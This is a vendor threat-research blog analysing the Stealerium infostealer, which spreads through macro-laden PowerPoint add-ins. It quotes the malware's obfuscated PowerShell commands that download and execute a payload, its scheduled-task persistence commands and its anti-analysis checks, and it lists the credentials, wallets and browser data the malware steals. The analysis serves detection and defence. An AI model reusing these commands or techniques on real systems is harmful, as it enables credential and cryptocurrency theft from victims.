Deciphering Stealerium Malware: Exploring Evasion Techniques & Insights

Blog Author
Karthickkumar Kathiresan

The Uptycs threat research team has recently identified an attack campaign that uses Stealerium, a type of stealer malware. It’s delivered through Microsoft Office attachments containing malicious macros. Once activated, it’s capable of stealing sensitive information such as network information, system information, screenshots and login credentials for cryptocurrency wallets.


In general, stealer malware is used by cybercriminals focused on pilfering account credentials. Uptycs observed an increase in Stealerium promotion on hacker forums. It’s worrisome in that it can be injected into legitimate processes, thus making it difficult to detect and remove as detailed in this technical analysis.


Coded in C#, the Uptycs team identified an open source version of the malware available on GitHub. We suspect threat actors have likely modified this to launch attacks via PowerPoint presentations. Here the miscreants leverage PowerPoint, but it's feasible for them to use other Office applications for their malicious purposes.

Infection FlowFig 1-3

Figure 1 - Stealerium infection flow


A PowerPoint (.ppam) file prompts a victim to enable macros when run. When enabled, a pop-up window displays a "Loading PDF" message and an OK button. Clicking that infects the victim’s system.


Fig 2-2

Figure 2 - PowerPoint execution with pop-up window


Threat actors upload malicious files in the form of text files to online storage sites to easily spread their malware globally. Stealerium uses PowerShell to download a file named 2.txt from such an online site


Figure 3 shows the Stealerium process flow.


Fig 3-3

Figure 3 - Stealerium process flow

Technical Analysis

Text file contents (2.txt)

Upon execution, Stealerium terminates PowerPoint and deletes all .ppam files in the Desktop and Downloads folders of a victim’s computer. It then creates a new subfolder in the %ProgramData% folder and places the following four files there (figure 4)—in addition to its startup location. 


Fig 4-3

Figure 4 - Dropped files


These enable the malware to persist even after a reboot. Its ability to steal information remains intact.



This file has an unknown extension and contains code for the stealer payload executed by its three JavaScript companions. 


Fig 5-3

Figure 5 - Unknown extension file contains two variables


Two variables (highlighted) are shown in figure 5.

  • AntiCrisper holds hexadecimal code for the Stealerium malware. 
  • GORMAX32 is a string that leads to another level of encoded data. Once decrypted, it’s revealed to be a combination of binary and script files (as follows).
Binary file – This DLL loads RegSvcs and Msbuild.


Fig 6-3

Figure 6 - Injection function

Script file – Modifies Windows Defender by adding exclusion paths and extensions as well as disabling certain features.


Fig 7-4

Figure 7 - Windows Defender modification

JavaScript files

The aforementioned JavaScript files attempt to execute the stealer payload using a PowerShell script. And they’re scheduled to run at specific times using Windows Task Scheduler.


Drivers.js – This uses a PowerShell command and the same process flow shown in figure 3 to download the aforementioned 2.txt file from a specific URL.


PowerShell command line:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP Bypass -c (I'w'r('') -useB) | .('{1}{0}'-f'eX','I') | ping

OneDriveUpdate.js and OutlookUpdate.js – These read the CypherDeptography.~+~ file and use the Windows PowerShell command line to execute code intended to steal the victim’s computer data.

Stealerium payload

This stealer performs the following:

  • Evades detection by antivirus and endpoint detection and response (EDR) systems
  • Collects potentially sensitive information from a targeted system
  • Relays a stolen information report to an attacker-controlled server. A payload description section contains a Github project link

Fig 8-4

Figure 8 - Payload description includes a Github link


It’s coded to extract data from infected devices using various functions (figure 9).


Fig 9-3

Figure 9 - Payload functions


Delayed Execution

Using a sleep function to postpone execution assists malware in evading detection by sandbox systems.



The malware employs anti-analysis techniques prior to its execution, such as checking for specific tools and environment settings. If it detects it’s running in an environment that would likely be used for analysis, it halts execution to evade detection.


Tool Name



Use isDebuggerPresent() API to check if a debugger
is present on infected system


Check if system is running on an emulator by comparing date and time


Compare system IP address to known IP addresses associated
with sandbox environments (e.g., VirusTotal, anyRun)


Check if certain processes are running on the infected system, e.g., process hacker, netstat, netmon, tcpview, wireshark, filemon, regmon, cain


Check for presence of specific DLL files commonly used
in sandboxed environments


Check OS environment


Stealerium monitors the victim's keyboard and stores information in log files. It also captures screenshots from the webcam and desktop; these are also stored in log files and sent to the attacker's server.



The stealer specifically targets Chromium-based (e.g., Chrome, Edge) and Firefox web browsers. It collects and forwards data such as cookies, bookmarks, browsing history, autofill information, passwords, browser extensions, and credit card details. It also targets banking and cryptocurrency services accessed through browsers.

Fig 10-2

Figure 10 - Gathered sensitive information


Account Information

The malware gathers information from a wide range of other sources as well. This includes Discord tokens, FileZilla host data, autorun modules, directory structure, and data from Outlook email accounts. 


It collects details of VPN clients such as NordVPN, OpenVPN, and ProtonVPN. And it captures session data from popular games such as BattleNet, Minecraft, and Uplay, in addition to messengers (Skype, Element, Telegram, Pidgin) and Crypto Wallets (Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet, Guarda, Coinomi, Litecoin, Dash, Bitcoin).


Fig 11-3

Figure 11 - Gathered system information via functions


Victim system information

Stealerium attempts to gather other data, too, including IP details, system information, running process data, directory structure details, and more (figure 11). All can be used by an attacker for malicious purposes. 


The following table lists the types of information it can exfiltrate.


Data Theft



Gathers a list of running system processes along with their executable paths, saving all to a “Windows.txt” file.


Captures system desktop screenshot  to "Desktop.jpg" file.


The malware contains a list of folders (e.g, Desktop, My Documents, My Pictures, My Videos, Startup, Downloads, Dropbox, OneDrive, TEMP) and examines all subfolders and files within. It stores this data as a tree structure.


Collects all files from specific folders, including Desktop, My Documents, My Pictures, Downloads, Dropbox, OneDrive, and TEMP.


Collects specific system information, including IP, machine, and virtualization details, saving it all in an "info.txt" file.


Collects installed application details by running a "SELECT * FROM Win32_Product" query. Details include application name, version, and publisher. The malware saves this data as "Apps.txt".


Gathers the execution path and process ID for non-system processes by way of a "SELECT ExecutablePath, ProcessID FROM Win32_Process" query. This data is saved as "Process.txt".


The malware retrieves the Windows product key from SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId in the system registry. It’s stored in "ProductKey.txt".


Gathers the system's public IP, local IP, default gateway, user name, computer name, OS version, CPU name, GPU name, amount of RAM, system date, screen metrics, battery information, number of connected cameras, any indication of virtualization software (e.g., VirtualBox, Sandbox, Emulator, Debugger), running process details, any indication of hosting or cloud services, and details of any installed antivirus software.


Collects details (e.g., manufacturer, device name, description) of connected cameras by running the "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" query.


Scans available  Wi-Fi networks by running the  "chcp 65001 && netsh wlan show networks mode=bssid" command. This returns the network name (SSID), signal strength, channel, and BSSID, saving the data in a "ScanningNetworks.txt" file.

The following pertains to the startup location, scheduling of tasks, and the command line used for Stealerium execution.

Stealer Persistence

  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CypherDeptography.~+~
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.js
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDriveUpdate.js
  • C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OutlookUpdate.js

Scheduled Task

  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 132 /tn Driversed /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\Drivers.js"
  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 120 /tn MainChrome /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OneDriveUpdate.js"
  • "C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 143 /tn ChromeUAC /F /tr "wscript.exe //b //e:jscript C:\\ProgramData\\MegamindCypher\\OutlookUpdate.js"


Powershell iwr -uri -UseB -UseDefaultCredentials | &('MMM'.replace('MMM','I')+'dildo'.replace('dildo','EX'))

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EP Bypass -c Get-Content -RAW C:\ProgramData\MegamindCypher\CypherDeptography.~+~ | .('{1}{0}'-f'eX','I') | ping

Conclusion – Detect and Block Stealerium Attacks

To defend against malware attacks such as Stealerium, Uptycs recommends to:

  • Keep all software and OS up to date with the latest security patches.
  • Avoid clicking on suspicious links or opening attachments from unknown sources.
  • Use a firewall to block unauthorized access to your computer.
  • Use a strong and unique password for every online account.
  • Regularly update passwords to reduce the risk of a large-scale attack.

Enterprises must have tight security controls and multi-layered visibility coupled with security solutions to identify and detect malware such as Stealerium. For example: Uptycs’ EDR engine detected Stealerium activity by correlating generic behavioral rules and YARA process scanning capabilities.

Uptycs EDR Detection

In addition to having YARA built-in, Uptycs EDR customers can easily scan for Stealerium since our tool is armed with other advanced detection capabilities. EDR contextual detection provides important details about identified malware. Users can navigate to the toolkit data section in the detection alert, then click on the name of a detected item to reveal its profile (figure 12).


Fig 12-3

Figure 12 - Uptycs EDR detection

Stealerium IOCs


File Name

MD5 hash

PURCHASE ORDER91273_2.ppam












Atom.xml (2.txt)


Loader DLL


Stealerium stealer.exe(Memory)




The URLs were utilized by malware.